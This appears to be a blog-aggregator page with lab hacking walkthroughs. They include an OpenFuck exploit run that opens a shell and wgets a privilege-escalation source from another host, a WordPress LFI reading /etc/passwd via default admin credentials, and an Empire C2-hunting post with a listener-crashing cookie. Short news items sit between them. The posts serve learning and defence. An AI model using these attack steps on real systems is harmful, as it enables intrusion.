0x50 - RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)
0x51 - RedHat Linux 6.0 Update (apache-1.3.24)
0x52 - RedHat Linux 6.1 (apache-1.3.9-4)1
0x53 - RedHat Linux 6.1 (apache-1.3.9-4)2
0x54 - RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)
0x55 - RedHat Linux 6.1-fp2000 (apache-1.3.26)
0x56 - RedHat Linux 6.2 (apache-1.3.12-2)1
0x57 - RedHat Linux 6.2 (apache-1.3.12-2)2
0x58 - RedHat Linux 6.2 mod(apache-1.3.12-2)3
0x59 - RedHat Linux 6.2 update (apache-1.3.22-5.6)1
0x5a - RedHat Linux 6.2-Update (apache-1.3.22-5.6)2
0x5b - Redhat Linux 7.x (apache-1.3.22)
0x5c - RedHat Linux 7.x (apache-1.3.26-1)
0x5d - RedHat Linux 7.x (apache-1.3.27)
0x5e - RedHat Linux 7.0 (apache-1.3.12-25)1
0x5f - RedHat Linux 7.0 (apache-1.3.12-25)2
0x60 - RedHat Linux 7.0 (apache-1.3.14-2)
0x61 - RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)
0x62 - RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)
0x63 - RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)
0x64 - RedHat Linux 7.1 (apache-1.3.19-5)1
0x65 - RedHat Linux 7.1 (apache-1.3.19-5)2
0x66 - RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)
0x67 - RedHat Linux 7.1-Update (1.3.22-5.7.1)
0x68 - RedHat Linux 7.1 (apache-1.3.22-src)
0x69 - RedHat Linux 7.1-Update (1.3.27-1.7.1)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x6c - RedHat Linux 7.2-Update (apache-1.3.22-6)
0x6d - RedHat Linux 7.2 (apache-1.3.24)
0x6e - RedHat Linux 7.2 (apache-1.3.26)
0x6f - RedHat Linux 7.2 (apache-1.3.26-snc)
0x70 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)1
0x71 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)2
0x72 - RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)
0x73 - RedHat Linux 7.3 (apache-1.3.23-11)1
0x74 - RedHat Linux 7.3 (apache-1.3.23-11)2
0x75 - RedHat Linux 7.3 (apache-1.3.27)
0x76 - RedHat Linux 8.0 (apache-1.3.27)
0x77 - RedHat Linux 8.0-second (apache-1.3.27)
0x78 - RedHat Linux 8.0 (apache-2.0.40)
0x79 - Slackware Linux 4.0 (apache-1.3.6)
0x7a - Slackware Linux 7.0 (apache-1.3.9)
0x7b - Slackware Linux 7.0 (apache-1.3.26)
0x7c - Slackware 7.0 (apache-1.3.26)2
0x7d - Slackware Linux 7.1 (apache-1.3.12)
0x7e - Slackware Linux 8.0 (apache-1.3.20)
0x7f - Slackware Linux 8.1 (apache-1.3.24)
0x80 - Slackware Linux 8.1 (apache-1.3.26)
0x81 - Slackware Linux 8.1-stable (apache-1.3.26)
0x82 - Slackware Linux (apache-1.3.27)
0x83 - SuSE Linux 7.0 (apache-1.3.12)
0x84 - SuSE Linux 7.1 (apache-1.3.17)
0x85 - SuSE Linux 7.2 (apache-1.3.19)
0x86 - SuSE Linux 7.3 (apache-1.3.20)
0x87 - SuSE Linux 8.0 (apache-1.3.23)
0x88 - SUSE Linux 8.0 (apache-1.3.23-120)
0x89 - SuSE Linux 8.0 (apache-1.3.23-137)
0x8a - Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)
Looks like we need to do a little more digging. We know we have RedHat and we know it's Apache 1.3.20, so it looks like our options are

0x6a or 0x6b

Let's try the first one


root@kali:~# ./openfuck 0x6a 172.16.2.13 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80ffe70
Ready to send shellcode
Spawning shell...
Good Bye!

Doesn't look like it, so let's try the other one


root@kali:~# ./openfuck 0x6b 172.16.2.13 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
ace-kmod.c; rm ptrace-kmod.c; ./p; wget 172.16.2.21/ptrace-kmod.c; gcc -o p ptr
--15:08:48-- http://172.16.2.21/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 172.16.2.21:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 4,128 [text/x-csrc]

0K .... 100% @ 3.94 MB/s

15:08:48 (3.94 MB/s) - `ptrace-kmod.c' saved [4128/4128]

/usr/bin/ld: cannot open output file p: Permission denied
collect2: ld returned 1 exit status
pwd
/tmp
whoami
root

We have root! It might also take a couple of tries running OpenFuck before it works, but it will work if everything is set up correctly. In another post I'll go over troubleshooting for OpenFuck, since I had a hard time after doing a dist-upgrade of Kali. Hope y'all enjoy these walkthroughs.

by k0ncepts (noreply@blogger.com)

In the news

"The US has become a real gulag, where we live with a boot on our face" - RT en Español - Noticias internacionales

In this episode of 'Keiser Report', Max Keiser and Stacy Herbert discuss how privacy on the Internet has been done away with for a measly million dollars. In the second part of the broadcast Max continues his interview with Jaromil, of Dyne.org, about the ...

April 05, 2017

In the news

Trasformatorio 2017 - Arte.it

The event is organised by Siddharte and Dyne.org with the patronage of the municipal administration of Scaletta Zanclea and in collaboration with WISH (World International Sicilian Heritage), CairoTronica (International Symposium of Digital Arts of Cairo ...

Messina: the third edition of Trasformatorio gets under way at the Castello Rufo Ruffo in Scaletta Zanclea - Stretto web

The event is organised by Siddharte and Dyne.org with the patronage of the municipal administration of Scaletta Zanclea and in collaboration with WISH (World International Sicilian Heritage), CairoTronica (International Symposium of Digital Arts of Cairo ...

Chokepoint

Hunting Red Team Empire C2 Infrastructure

Introduction

While playing around with setting up my C2 nodes and redirectors for an engagement, I decided to start poking around at both Empire's and Meterpreter's default setups. The end goal of this project was to be able to positively identify nodes on the Internet that are being actively used by attackers or Red Teams with little to no scope filtering. The results were interesting: the first round of investigation revealed over twenty easy-to-find C2 nodes running stock Empire or Meterpreter reverse http/s sessions.

History of Failure

Coding is difficult, even for hackers. Both the Empire and Metasploit projects have a history of Remote Code Execution vulnerabilities. Red Teams need to go to great lengths to keep people from compromising their crown jewels, which include active agents and client data.

Empire RCE
Metasploit RCE

Empire

Empire, now in beta for 2.0, includes both PowerShell Empire and the Python version, EmPyre. The Empire listener is based on BaseHTTPServer in Python and provides an abstraction layer on top of it. Let's take a look at the HTTP headers that are present in the default Empire configuration.

Empire Headers

Using the HTTP request of GET / HTTP/1.1, the following headers were returned.


HTTP/1.0 200 OK
Server: Microsoft-IIS/7.5
Date: Wed, 05 Apr 2017 18:26:10 GMT

The thing that stands out here is the general lack of headers that would normally be present in a response. Also, we used HTTP/1.1 as the protocol, but the reply is still HTTP/1.0.

Empire default page


<html><body><h1>It works!</h1><p>This is the default web page for this server.</p><p>The web server software is running but no content has been added, yet.</p></body></html>

Hashes of default page

MD5: 885ecd7910c988f1f15fcacca5e1734e
SHA1: b642227fbc703af1a67edb665241fc709ecd6f6e
SHA2: a58fb107072d9523114a1b1f17fbf5e7a8b96da7783f24d84f83df34abc48576

Finding Empire Listeners with Shodan

Shodan is a search engine for security researchers. It routinely scans common ports across the Internet and makes the data publicly available and easily searchable. APIs are also provided for automating many of the tasks involved.

Using the common headers, and default web page listed above, we are able to narrow down the list of possible Empire C2 nodes on the Internet with a simple query.


'Microsoft-IIS/7.5' 'It works!' -'Content-Type' -'Set-Cookie'

You'll notice that the results returned are all HTTP/1.0, with profiles matching what we scoped out above.

Finding an exception in Empire

The HTTP module in Empire is located in lib/common/http.py. Go ahead and use your favorite text editor to open that up, and have a look around at the code.

In the class RequestHandler and method do_GET we have the following piece of code for parsing cookie data.


if cookie:
    # search for a SESSIONID value in the cookie
    parts = cookie.split(";")
    for part in parts:
        if "SESSIONID" in part:
            # extract the sessionID value
            name, sessionID = part.split("=")

Interesting:

name, sessionID = part.split("=")

If there is more than one equals sign in the cookie field, it will keep splitting on equals signs, and unpacking the extra pieces into two names raises a ValueError. That line should be:

name, sessionID = part.split("=", 1)

in order to limit the number of splits to one.

Let's go ahead and try to exploit this from the client side with the following request.


curl http://target:port --cookie 'SESSIONID=id=id'

Curl will return the following error, because Python threw an exception while parsing the cookies.


curl: (52) Empty reply from server
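As an added illustration (not code from the Empire project or from this post), the three parsers below reproduce the quoted split, the proposed maxsplit fix, and a stricter variant of my own that also tolerates a bare SESSIONID with no '=' and ignores cookie names that merely contain the string SESSIONID; the cookie strings are constructed.

```python
"""Cookie-parsing behaviour around the SESSIONID split discussed above."""


def extract_session_id_as_shipped(cookie: str):
    """Parse as in the quoted lib/common/http.py snippet.

    A value with a second '=' (SESSIONID=id=id) splits into three pieces;
    unpacking three pieces into two names raises ValueError. Inside the
    listener that uncaught exception is what turns into curl's
    "Empty reply from server".
    """
    for part in cookie.split(";"):
        if "SESSIONID" in part:
            name, session_id = part.split("=")
            return session_id
    return None


def extract_session_id_patched(cookie: str):
    """The fix proposed above: maxsplit=1 keeps any further '=' in the value."""
    for part in cookie.split(";"):
        if "SESSIONID" in part:
            name, session_id = part.split("=", 1)
            return session_id
    return None


def extract_session_id_hardened(cookie: str):
    """Added, stricter variant (my suggestion, not the post's).

    Matches the cookie *name* exactly instead of testing substring
    membership, and treats a bare 'SESSIONID' with no '=' as absent
    instead of raising; str.partition never raises.
    """
    for part in cookie.split(";"):
        name, sep, value = part.strip().partition("=")
        if name == "SESSIONID":
            return value if sep else None
    return None


def survives(parser, cookie: str) -> bool:
    """True when the parser handles the cookie without raising ValueError."""
    try:
        parser(cookie)
        return True
    except ValueError:
        return False


# Constructed Cookie header values exercising the normal and edge cases.
NORMAL = "SESSIONID=abc123"
CRASHER = "SESSIONID=id=id"           # the cookie from the curl test above
BARE = "SESSIONID"                    # no '=' at all
LOOKALIKE = "XSESSIONIDX=1; other=2"  # name merely contains SESSIONID

if __name__ == "__main__":
    for label, cookie in [("normal", NORMAL), ("crasher", CRASHER),
                          ("bare", BARE), ("lookalike", LOOKALIKE)]:
        for parser in (extract_session_id_as_shipped,
                       extract_session_id_patched,
                       extract_session_id_hardened):
            ok = survives(parser, cookie)
            print(f"{label:9} {parser.__name__:30} "
                  f"{'ok' if ok else 'ValueError'}")
```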

Changing default values

While executing a Red Team engagement, it's always a good idea to change the default values of the tools you use, whether it be a scanner or C2 infrastructure. This will make it harder for Blue Team elements to detect portions of your activity. You should also either utilize Empire's whitelisting feature or set up a firewall in order to keep your test within scope. There is no excuse for leaving your C2 node exposed to the entire Internet.

You should have noticed while browsing http.py that the default page served is also defined in that file, in the function named default_page.

In order to change the default server name, you must edit the configuration in the empire.db file located in data/. Open it up with sqlite3 data/empire.db. You can view the current setting by typing SELECT server_version from config; and to update it, something like the following will do the job.


update config set server_version = 'nginx' where server_version = 'Microsoft-IIS/7.5';

Going beyond Shodan

Scans.io is another great resource for looking at Internet-wide scans, including those of HTTPS sites. The scan sets are huge, but offer a very current view of HTTPS servers across the globe. The data is in JSON format, and each host's page is stored base64-encoded within its record.


zgrep 'PGh0bWw+PGJvZHk+PGgxPkl0IHdvcmtzITwvaDE+PHA+VGhpcyBpcyB0aGUgZGVmYXVsdCB3ZWIgcGFnZSBmb3IgdGhpcyBzZXJ2ZXIuPC9wPjxwPlRoZSB3ZWIgc2VydmVyIHNvZnR3YXJlIGlzIHJ1bm5pbmcgYnV0IG5vIGNvbnRlbnQgaGFzIGJlZW4gYWRkZWQsIHlldC48L3A+PC9ib2R5PjwvaHRtbD4=' 20170221-https.gz > /tmp/results.json

This may take several minutes to run, as the datasets are generally several gigabytes in size. The result will be a file containing JSON data for each host that returned the default Empire HTML. You can parse this file and extract each IP address that should be tested, and then feed them into the script below.

Automating detection with Python

Use the following to run this script.


python3 empire_identifier.py
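As an added example (not the author's empire_identifier.py, which is not reproduced here), the following Python applies the fingerprint built up above (HTTP/1.0 reply, Server header, absence of Content-Type/Set-Cookie, byte-exact default page) to a raw HTTP response, reports the body's SHA-256 for correlation with the hashes listed earlier, and derives the base64 needle used in the scans.io zgrep; the two responses are constructed samples.

```python
"""Score a raw HTTP response against the stock Empire listener profile."""
import base64
import hashlib

# Default page served by Empire's lib/common/http.py, exactly as quoted above.
EMPIRE_DEFAULT_PAGE = (
    "<html><body><h1>It works!</h1><p>This is the default web page for this "
    "server.</p><p>The web server software is running but no content has "
    "been added, yet.</p></body></html>"
)
EMPIRE_DEFAULT_SERVER = "Microsoft-IIS/7.5"


def parse_response(raw: bytes):
    """Split a raw response into (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def empire_indicators(raw: bytes) -> list:
    """Return the list of stock-Empire traits present in the response."""
    status, headers, body = parse_response(raw)
    found = []
    if status.startswith("HTTP/1.0 "):
        found.append("HTTP/1.0 status line in reply to an HTTP/1.1 request")
    if headers.get("server") == EMPIRE_DEFAULT_SERVER:
        found.append("Server: Microsoft-IIS/7.5")
    if set(headers) <= {"server", "date"}:
        found.append("no headers beyond Server and Date "
                     "(no Content-Type, no Set-Cookie)")
    if body.rstrip(b"\r\n") == EMPIRE_DEFAULT_PAGE.encode():
        found.append("byte-exact default 'It works!' page")
    return found


def classify(raw: bytes) -> dict:
    """Verdict plus the body hash, for correlating with the hashes listed above."""
    found = empire_indicators(raw)
    _, _, body = parse_response(raw)
    if len(found) >= 3:
        verdict = "likely stock Empire"
    elif len(found) == 2:
        verdict = "possible"
    else:
        verdict = "unlikely"
    return {"verdict": verdict, "indicators": found,
            "body_sha256": hashlib.sha256(body).hexdigest()}


def scans_io_needle() -> str:
    """Base64 of the default page: the string to zgrep for in a scans.io dump."""
    return base64.b64encode(EMPIRE_DEFAULT_PAGE.encode()).decode()


# Constructed samples: the first mirrors the headers and page quoted above,
# the second is what a real IIS host serving its own content looks like.
SAMPLE_EMPIRE = (
    b"HTTP/1.0 200 OK\r\n"
    b"Server: Microsoft-IIS/7.5\r\n"
    b"Date: Wed, 05 Apr 2017 18:26:10 GMT\r\n"
    b"\r\n" + EMPIRE_DEFAULT_PAGE.encode()
)
SAMPLE_REAL_IIS = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/7.5\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 19\r\n"
    b"Date: Wed, 05 Apr 2017 18:26:10 GMT\r\n"
    b"\r\n"
    b"<h1>Intranet</h1>\r\n"
)

if __name__ == "__main__":
    for name, sample in (("empire-like", SAMPLE_EMPIRE),
                         ("real IIS", SAMPLE_REAL_IIS)):
        print(name, classify(sample))
    print("scans.io needle:", scans_io_needle())
```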

Happy hunting, a future post will detail similar experiences with Meterpreter.

by stderr (noreply@blogger.com)

April 03, 2017

Data Knightmare

dataKnightmare 1x25 - Interview with JM Porup on the 95 theses for the immaterial world

JM Porup, author of the "95 tesi per il mondo immateriale" (bit.ly/95cyberit), answers dataKnightmare's questions on cyber rights, data imperialism and how to escape surveillance capitalism in the long run (even if in the long run we will all be dead). A RUNTIME RADIO EXCLUSIVE! After the Italian version, the original English interview follows. **** STARTING AT 31'55", the podcast contains the original English interview. Share and enjoy! JM Porup, author of the "95 Theses of Cyber" (bit.ly/95cyber) chats with the dataKnightmare about cyber rights, data empires and how to escape surveillance capitalism in the long run (even if in the long run we will all be dead). A RUNTIME RADIO EXCLUSIVE!

by Runtime Radio

Trasformatorio

T 2017: First Program Draft

The Trasformatorio 2017 topic will be “situation based street art”. The program of the lab is designed to establish the basics of the groundwork in Scaletta Alta and to lay out the lines of the surroundings, studying the site in relation to each artist’s personal work and beginning to transform it through art interventions. Art interventions will be in the […]

by fredd

April 02, 2017

Chokepoint

hackfest2016: Quaoar - Vulnhub Walk Through

Introduction

This is the first boot2root box I’ll be tackling in a series of boot2roots I’ll be doing to learn. I chose this one because it’s new, it’s beginner stage, and it’s got some helpful hints on Vulnhub to get you started. I’ll be documenting my findings and doing a write-up of every box I attempt to boot2root from Vulnhub or other sources. This is both for my benefit and for others who might get stuck in the future. Beware that these will contain spoilers, as they show how I gained root on these boxes. I’m using Kali XFCE with 20 gigabytes of hard drive space and the basic default settings from VMWare. Nothing too special. The host is a 2014 MacBook Pro running the Intel i7 chip. Only the Kali and boot2root VMs will be on the same network.

Enumeration

Nmap was one of the hints the creator of this boot2root mentioned to use, so it’s where I started. I almost always use the switches -Pn -sV -p1-65535 -A to start with on these boot2roots: really deep dive the ports and grab headers. If this were a live pen test I likely wouldn’t make that much noise and would stick to the top ports, or try to find something more targeted from other sources first during pre-engagement. In any case, the results of the nmap scan were as follows.

root@kali:~# nmap -Pn -sV -p1-65535 -A 172.16.13.128

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-03-24 08:29 CDT
Nmap scan report for 172.16.13.128
Host is up (0.00041s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
| 2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_ 256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp open domain ISC BIND 9.8.1-P1
| dns-nsid:
|_ bind.version: 9.8.1-P1
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL STLS SASL CAPA TOP RESP-CODES PIPELINING
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after: 2026-10-07T04:32:43
|_ssl-date: 2017-03-24T13:30:07+00:00; 0s from scanner time.
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: capabilities STARTTLS more listed IDLE OK LOGIN-REFERRALS post-login Pre-login ENABLE ID LOGINDISABLEDA0001 LITERAL+ IMAP4rev1 SASL-IR have
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after: 2026-10-07T04:32:43
|_ssl-date: 2017-03-24T13:30:07+00:00; 0s from scanner time.
445/tcp open netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: AUTH=PLAINA0001 more listed IDLE OK LOGIN-REFERRALS post-login capabilities ENABLE ID Pre-login LITERAL+ IMAP4rev1 SASL-IR have
|_ssl-date: 2017-03-24T13:30:07+00:00; 0s from scanner time.
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: UIDL USER SASL(PLAIN) CAPA TOP RESP-CODES PIPELINING
|_ssl-date: 2017-03-24T13:30:07+00:00; 0s from scanner time.
MAC Address: 00:0C:29:C7:5D:11 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: , NetBIOS MAC: (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.6.3)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2017-03-24T09:30:07-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

TRACEROUTE
HOP RTT ADDRESS
1 0.41 ms 172.16.13.128

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.23 seconds
From nmap we know that port 80 is open, so next I went to the web browser to see what I could physically see. Nothing of interest there, so I went to DirBuster next, as the description on VulnHub hinted to use it. I ran DirBuster with the URL http://172.x.x.x:80 and navigated to /usr/share/dirbuster/wordlist/directory-list-1.0.txt. I let this run for 1-2 hours. Once I started seeing the WordPress stuff I figured that’s more or less what the creator wanted me to find in order to pivot to another tool.

The next tool I pivoted to is wpscan. This will help us determine any vulnerabilities in the plugins and find all directories, themes, and plugins associated with the WordPress server. First let's make sure the database is up to date with wpscan --update. Next is to run the actual wpscan against the WordPress site: wpscan --url 172.16.13.128/wordpress. I had to add the /wordpress because that’s where the WordPress site begins. This gives me some useful information about the themes and plugins available.

[+] URL: http://172.16.13.128/wordpress/
[+] Started: Fri Mar 24 15:09:59 2017

[!] The WordPress 'http://172.16.13.128/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3
[+] XML-RPC Interface available under: http://172.16.13.128/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://172.16.13.128/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://172.16.13.128/wordpress/wp-includes/

[+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
[!] 8 vulnerabilities identified from the version number

[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
Reference: https://wpvulndb.com/vulnerabilities/8716
Reference: https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
[i] Fixed in: 3.9.15

[!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
Reference: https://wpvulndb.com/vulnerabilities/8718
Reference: https://www.mehmetince.net/low-severity-wordpress/
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
[i] Fixed in: 3.9.15

[!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
Reference: https://wpvulndb.com/vulnerabilities/8719
Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
[i] Fixed in: 3.9.15

[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
Reference: https://wpvulndb.com/vulnerabilities/8720
Reference: https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
[i] Fixed in: 3.9.15

[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
Reference: https://wpvulndb.com/vulnerabilities/8721
Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
[i] Fixed in: 3.9.15

[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8730
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 3.9.16

[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
Reference: https://wpvulndb.com/vulnerabilities/8765
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
Reference: http://seclists.org/oss-sec/2017/q1/563
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
[i] Fixed in: 3.9.17

[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
Reference: https://wpvulndb.com/vulnerabilities/8766
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
[i] Fixed in: 3.9.17

[+] WordPress theme in use: twentyfourteen - v1.1

[+] Name: twentyfourteen - v1.1
| Location: http://172.16.13.128/wordpress/wp-content/themes/twentyfourteen/
[!] The version is out of date, the latest version is 1.9
| Style URL: http://172.16.13.128/wordpress/wp-content/themes/twentyfourteen/style.css
| Referenced style.css: wp-content/themes/twentyfourteen/style.css
| Theme Name: Twenty Fourteen
| Theme URI: http://wordpress.org/themes/twentyfourteen
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
| Author: the WordPress team
| Author URI: http://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Fri Mar 24 15:10:02 2017
[+] Requests Done: 48
[+] Memory used: 17.445 MB
[+] Elapsed time: 00:00:02

So from wpscan we now know it’s running the default WordPress theme, twentyfourteen. It also gives us some other useful information, such as which version of WordPress is running and the known vulnerabilities for themes, versions, plugins, etc. But let's try to enumerate users to see if we can dig a little deeper. Let's use wpscan again for this: wpscan --url 172.16.13.128/wordpress --enumerate u

[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
+----+--------+--------+
| Id | Login | Name |
+----+--------+--------+
| 1 | admin | admin |
| 2 | wpuser | wpuser |
+----+--------+--------+
[!] Default first WordPress username 'admin' is still used

Gaining Access


Interesting! Still using the default ‘admin’ account. I wonder if that password has been reset from the default or if it’s using a weak password. Let's check on the wp-login.php page: 172.16.13.128/wordpress/wp-login.php with username ‘admin’ and password ‘admin’. Looks like the password worked! So let's explore, just in case wpscan missed anything. Looks like we have 2 plugins, ‘hello dolly’ and ‘mail masta’. A quick Google reveals that Mail Masta has a Local File Inclusion exploit associated with it and gives a PoC (proof of concept). Let's give it a try and see if we can find the /etc/passwd file.

BINGO! Alright, so now we’ve got a list of users on this box we can try to brute force against, or should we dive slightly deeper? Maybe also get /etc/shadow? Well, that didn’t quite work, so let's look for more low-hanging fruit. Let's see what useful information is in /etc/passwd. Each line of this file carries seven fields, laid out like this:

username:password:UserID:GroupID:Comment:HomeDir:UserShell
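As an added example (not from the walkthrough), the following Python parses that seven-field layout and performs the checks a defender makes on the file: entries whose password field is empty, entries carrying a hash in passwd instead of the 'x' that points at /etc/shadow, extra UID 0 accounts, and accounts with an interactive login shell. The passwd text is a constructed sample, not the box's file.

```python
"""Audit /etc/passwd entries using the seven-field layout described above."""
from dataclasses import dataclass

# Shells that refuse interactive logins. An empty shell field is NOT in this
# set: passwd(5) says login falls back to /bin/sh in that case.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin",
                  "/bin/false", "/usr/bin/false"}


@dataclass
class PasswdEntry:
    username: str
    password: str   # 'x' = hash lives in /etc/shadow; '*' or '!...' = locked
    uid: int
    gid: int
    comment: str
    home: str
    shell: str


def parse_passwd(text: str) -> list:
    """Parse passwd-format text; reject lines without exactly 7 fields."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        user, pw, uid, gid, comment, home, shell = fields
        entries.append(PasswdEntry(user, pw, int(uid), int(gid),
                                   comment, home, shell))
    return entries


def audit(entries) -> dict:
    """Flag the conditions a defender checks first in this file."""
    findings = {
        "empty_password": [],   # login possible with no password at all
        "hash_in_passwd": [],   # hash exposed in the world-readable file
        "extra_uid0": [],       # a second root-equivalent account
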